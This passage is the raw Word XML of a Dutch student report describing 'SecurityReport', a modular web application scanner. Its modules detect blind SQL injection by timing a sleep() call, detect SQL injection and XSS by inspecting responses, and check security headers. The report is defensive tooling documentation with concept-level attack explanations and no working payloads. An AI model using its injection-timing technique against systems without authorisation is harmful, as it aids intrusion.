                        <a:ln w="28575">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374872" id="Elbow Connector 58" o:spid="_x0000_s1026" type="#_x0000_t34" style="position:absolute;margin-left:129.25pt;margin-top:178.75pt;width:89.95pt;height:45.3pt;flip:y;z-index:25265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" adj="11073" strokecolor="#4472c4 [3204]" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="008E022D">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252649472" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2D25EB35" wp14:editId="3D901EC5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>245110</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2613025</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1397000" cy="458470"/>
                <wp:effectExtent l="0" t="0" r="25400" b="24130"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="48" name="Text Box 48"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1397000" cy="45847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78DFF22" w14:textId="13ECB8C0" w:rsidR="002A05E5" w:rsidRPr="006343E2" w:rsidRDefault="002A05E5" w:rsidP="006343E2">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Aanval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EB35" id="Text Box 48" o:spid="_x0000_s1128" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:19.3pt;margin-top:205.75pt;width:110pt;height:36.1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" fillcolor="#ffc000 [3207]" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="678DFF22" w14:textId="13ECB8C0" w:rsidR="002A05E5" w:rsidRPr="006343E2" w:rsidRDefault="002A05E5" w:rsidP="006343E2">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Aanval Module</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00410775">
        <w:t>De scanner zal een modulair</w:t>
      </w:r>
      <w:r w:rsidR="00B63048">
        <w:t xml:space="preserve"> software architectuur hebben zodat het makkelijk uitbreidbaar is met nieuwe module</w:t>
      </w:r>
      <w:r w:rsidR="00DB3D1C">
        <w:t>s. Een scanmodule is een aanvalstype</w:t>
      </w:r>
      <w:r w:rsidR="00BD5606">
        <w:t xml:space="preserve"> die de w</w:t>
      </w:r>
      <w:r w:rsidR="00B63048">
        <w:t>ebapplicatie scanner uitvoert. In het onderzoek (H3) ben ik tot de conclusie gekomen dat er in de scope van dit project maar drie aanval types feasible/haalbaar zijn, Blind SQLi, SQLi en XSS. Naast deze 3 scanmodule is er ook een ander type module, de Header module. Deze module voert geen gesimuleerde aanvallen uit omdat het een ander werking heeft, het valt dus niet onder de categorie aanval type. De modulaire software architectuur bestaat uit een basismodule, een blueprint/template, dit is de basis voor elke scan modules. Een andere uitleg is dat de basismodule abstract is, wat betekent dat het verschillende vormen kan aannemen en dat er vanuit de basismodule concrete scanmodules gemaakt kunnen worden</w:t>
      </w:r>
      <w:r w:rsidR="00E96B13">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00967801">
        <w:t xml:space="preserve"> De aanval module heeft drie concrete klassen en deze </w:t>
      </w:r>
      <w:r w:rsidR="00E33CDD">
        <w:t>klassen overerven de twee basis</w:t>
      </w:r>
      <w:r w:rsidR="00967801">
        <w:t>functies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A5C912" w14:textId="5C681CD2" w:rsidR="00AE7ADA" w:rsidRDefault="00AF12F4">
      <w:r>
        <w:t>Figuur 4.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E30DF9" w14:textId="77777777" w:rsidR="00B63048" w:rsidRDefault="00B63048">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="79159E25" w14:textId="77777777" w:rsidR="00446588" w:rsidRDefault="00446588" w:rsidP="00335A94">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="420471FB" w14:textId="18014D8C" w:rsidR="00245D9C" w:rsidRPr="00594305" w:rsidRDefault="001E678B" w:rsidP="00335A94">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:smallCaps/>
          <w:spacing w:val="10"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252744704" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="61E1FE3F" wp14:editId="194A2CC7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-903705</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-901165</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="608" name="Rectangle 60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02F7E" id="Rectangle 608" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.15pt;margin-top:-70.9pt;width:25pt;height:1031.7pt;z-index:-25057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ctU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" fillcolor="#ffd966 [1943]" strokecolor="#ffd966" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00245D9C" w:rsidRPr="00594305">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD766B0" w14:textId="1C0572D1" w:rsidR="00094ADB" w:rsidRDefault="00CB1057" w:rsidP="00245D9C">
      <w:r>
        <w:t>SecurityReport heeft 4 Scan Modules waarmee he</w:t>
      </w:r>
      <w:r w:rsidR="00013B8C">
        <w:t>t kwetsbaarheden identificeert. De Scan Modules</w:t>
      </w:r>
      <w:r w:rsidR="0018123F">
        <w:t xml:space="preserve"> (Blind)</w:t>
      </w:r>
      <w:r w:rsidR="00013B8C">
        <w:t xml:space="preserve"> SQLi en XSS </w:t>
      </w:r>
      <w:r w:rsidR="00576FC2">
        <w:t xml:space="preserve">vallen onder hetzelfde categorie </w:t>
      </w:r>
      <w:r w:rsidR="005970CC">
        <w:t>“gesimuleerde aanvallen” de Header Module voert geen aanvallen uit maar gebruikt de header data die</w:t>
      </w:r>
      <w:r w:rsidR="00800541">
        <w:t xml:space="preserve"> verzameld is door de c</w:t>
      </w:r>
      <w:r w:rsidR="001650D4">
        <w:t xml:space="preserve">rawler. </w:t>
      </w:r>
      <w:r w:rsidR="00145FDB">
        <w:t>De drie Modules van de categorie gesimuleerde aanvallen voeren HTTP GET en POST aanvallen</w:t>
      </w:r>
      <w:r w:rsidR="00BD4696">
        <w:t xml:space="preserve"> uit </w:t>
      </w:r>
      <w:r w:rsidR="00DB74A5">
        <w:t xml:space="preserve">maar verschillen </w:t>
      </w:r>
      <w:r w:rsidR="00094ADB">
        <w:t>in de manier hoe de kwetsbaarheden wordt geïdentificeerd.</w:t>
      </w:r>
      <w:r w:rsidR="00F5366A">
        <w:t xml:space="preserve"> In tabel 4.12 staan de kenmerken van de 4 Scan Modules.</w:t>
      </w:r>
      <w:r w:rsidR="00094ADB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2307"/>
        <w:gridCol w:w="3535"/>
        <w:gridCol w:w="1943"/>
        <w:gridCol w:w="1275"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD669F" w14:paraId="1621F1F3" w14:textId="5A32622D" w:rsidTr="0000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AD72019" w14:textId="3D8ECE6A" w:rsidR="00DD669F" w:rsidRDefault="00DD669F" w:rsidP="00245D9C">
            <w:r>
              <w:t>Scan Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09F75061" w14:textId="76CC33B6" w:rsidR="00DD669F" w:rsidRDefault="00DD669F" w:rsidP="00245D9C">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Identificatie methode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1943" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FD33EED" w14:textId="3AE06569" w:rsidR="00DD669F" w:rsidRDefault="00DD669F" w:rsidP="00245D9C">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Risico Niveau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1275" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59ED3302" w14:textId="0170B805" w:rsidR="00DD669F" w:rsidRDefault="00DD669F" w:rsidP="00245D9C">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Kleur code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD669F" w14:paraId="28CAE80B" w14:textId="7BCACBAF" w:rsidTr="0000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F4BC7D4" w14:textId="11D6E829" w:rsidR="00DD669F" w:rsidRDefault="00DD669F" w:rsidP="00245D9C">
            <w:r>
              <w:t>Blind SQL Injectie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="093DCD9C" w14:textId="12E8D245" w:rsidR="00DD669F" w:rsidRDefault="00DD669F" w:rsidP="00245D9C">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Executie tijd bijhouden</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1943" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="230598FD" w14:textId="7703C332"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2DF4F15C" w14:textId="5C505388"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2218D468" w14:textId="28DC28C5" w:rsidTr="00000700">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2308" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B34C870" w14:textId="087EE89C" w:rsidR="00DD669F" w:rsidRDefault="00DD669F" w:rsidP="00245D9C">
            <w:r>
              <w:t>SQL Injectie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02FA2D62" w14:textId="67BE3AC4" w:rsidR="00DD669F" w:rsidRDefault="00DD669F" w:rsidP="00245D9C">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>SQL errors zoeken in Response</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1943" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52ABC106" w14:textId="66645943" w:rsidR="00DD669F" w:rsidRDefault="00DD669F" w:rsidP="00245D9C">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Hoog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1275" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2114D8F2" w14:textId="10A17FB2" w:rsidR="00DD669F" w:rsidRDefault="00DD669F" w:rsidP="00245D9C">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Rood</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD669F" w14:paraId="02CAD1DE" w14:textId="37D38B6A" w:rsidTr="0000070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308" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14F79B26" w14:textId="39E1F157" w:rsidR="00DD669F" w:rsidRDefault="00DD669F" w:rsidP="00245D9C">
            <w:r>
              <w:t>XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A07AE95" w14:textId="2BC9E7FC" w:rsidR="00DD669F" w:rsidRDefault="00DD669F" w:rsidP="00245D9C">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Javascript code zoeken in Response</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1943" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13C189A9" w14:textId="32C1422C"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499830A2" w14:textId="0575FBFD"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61751A1B" w14:textId="6E8E897F" w:rsidTr="00000700">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2308" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="195DA511" w14:textId="54A66F77" w:rsidR="00DD669F" w:rsidRDefault="00DD669F" w:rsidP="00245D9C">
            <w:r>
              <w:t>Security Headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3892355F" w14:textId="6FAA6579" w:rsidR="00DD669F" w:rsidRDefault="00DD669F" w:rsidP="00245D9C">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Security Headers zoeken</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1943" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C166031" w14:textId="3B145BDD" w:rsidR="00DD669F" w:rsidRDefault="00DD669F" w:rsidP="00245D9C">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Middel, Laag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1275" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D3DB463" w14:textId="40E0CEDE" w:rsidR="00DD669F" w:rsidRDefault="00DD669F" w:rsidP="00245D9C">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Oranje, Geel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A5ABE5C" w14:textId="60118382" w:rsidR="00B17534" w:rsidRDefault="00145FDB" w:rsidP="00245D9C">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF12F4">
        <w:t>Tabel 4.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C93D9D9" w14:textId="69315328" w:rsidR="00D42BAB" w:rsidRDefault="004C4F51" w:rsidP="00245D9C">
      <w:r>
        <w:t xml:space="preserve">Blind SQLi kwetsbaarheden worden ontdekt door de tijdduur van een SQL Query wanneer deze is uitgevoerd. Het doel van Blind SQLi aanvallen is niet om data op te vragen uit een database maar, om te controleren of de server de Blind SQLi uitvoert. Bij de uitvoering van de SQL Query wordt de functie </w:t>
      </w:r>
      <w:r w:rsidRPr="0065338F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gebruikt, deze functie vraagt om 1 parameter wat de tijdsduur is van hoelang de se</w:t>
      </w:r>
      <w:r w:rsidR="006278DC">
        <w:t>rver moet wachten (slapen) voor</w:t>
      </w:r>
      <w:r>
        <w:t>dat het een reactie (Response) teruggeeft. Bij een su</w:t>
      </w:r>
      <w:r w:rsidR="00D44C89">
        <w:t>ccesvolle Blind SQLi aanval voert</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de server de Query uit en wacht het de zolang als is ingesteld door de hacker, de hacker weet dan dat de server kwetsbaar en gaat dan over naar de wat zwaardere aanvallen, de SQLi a</w:t>
      </w:r>
      <w:r w:rsidR="002A570F">
        <w:t>anvallen. In figuur 4.19 worden</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> een aantal Blind SQLi aanvallen getoond.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626A248C" w14:textId="416F2755" w:rsidR="00107682" w:rsidRDefault="00663B82" w:rsidP="00245D9C">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252687360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="71A3EB45" wp14:editId="348B6ECA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3478530</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>86360</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237" name="Chevron 237"/>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1DE6E1"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7" o:spid="_x0000_s1026" type="#_x0000_t55" style="position:absolute;margin-left:273.9pt;margin-top:6.8pt;width:30pt;height:36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" adj="10800" fillcolor="#4472c4 [3204]" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252672000" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4EC32FAE" wp14:editId="64261B70">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1066800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>195580</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2343785" cy="224790"/>
                <wp:effectExtent l="0" t="0" r="18415" b="29210"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="178" name="Text Box 178"/>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2FA5162" w14:textId="364792A7" w:rsidR="002A05E5" w:rsidRPr="00F364DD" w:rsidRDefault="002A05E5" w:rsidP="00F364D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2FAE" id="Text Box 178" o:spid="_x0000_s1129" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:84pt;margin-top:15.4pt;width:184.55pt;height:17.7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" fillcolor="#ffd966" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="42FA5162" w14:textId="364792A7" w:rsidR="002A05E5" w:rsidRPr="00F364DD" w:rsidRDefault="002A05E5" w:rsidP="00F364DD">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:sz w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00F364DD">
                        <w:rPr>
                          <w:sz w:val="16"/>
                        </w:rPr>
                        <w:t>HTTP Request</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2670976" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1C9F3855" wp14:editId="24F792A6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-260985</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>543560</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1079500" cy="34163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BDA376" w14:textId="36E86AA4" w:rsidR="002A05E5" w:rsidRPr="005A7556" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:sz w:val="32"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="005A7556">
                              <w:rPr>
                                <w:sz w:val="32"/>
                              </w:rPr>
                              <w:t>Blind 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3855" id="Text Box 171" o:spid="_x0000_s1130" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-20.55pt;margin-top:42.8pt;width:85pt;height:26.9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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="06BDA376" w14:textId="36E86AA4" w:rsidR="002A05E5" w:rsidRPr="005A7556" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="32"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="005A7556">
                        <w:rPr>
                          <w:sz w:val="32"/>
                        </w:rPr>
                        <w:t>Blind SQL</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="32"/>
                        </w:rPr>
                        <w:t>I</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1682802" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5E443DF3" wp14:editId="48C1A08D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-332105</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>200660</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1210310" cy="1028065"/>
                <wp:effectExtent l="0" t="0" r="34290" b="13335"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21347"/>
                    <wp:lineTo x="21759" y="21347"/>
                    <wp:lineTo x="21759" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="181" name="Rectangle 18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A4A1" id="Rectangle 181" o:spid="_x0000_s1026" style="position:absolute;margin-left:-26.15pt;margin-top:15.8pt;width:95.3pt;height:80.95pt;z-index:251682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" filled="f" strokecolor="#ffd966" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00287519">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252678144" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="058FD3A5" wp14:editId="47392E8B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4756150</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>540385</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="816610" cy="226060"/>
                <wp:effectExtent l="0" t="0" r="21590" b="27940"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21843"/>
                    <wp:lineTo x="21499" y="21843"/>
                    <wp:lineTo x="21499" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="207" name="Rectangle 207"/>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9520" id="Rectangle 207" o:spid="_x0000_s1026" style="position:absolute;margin-left:374.5pt;margin-top:42.55pt;width:64.3pt;height:17.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0192" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5879C1AF" wp14:editId="77BB64DB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4751705</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>880110</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="816610" cy="117475"/>
                <wp:effectExtent l="0" t="0" r="21590" b="34925"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="23351"/>
                    <wp:lineTo x="21499" y="23351"/>
                    <wp:lineTo x="21499" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
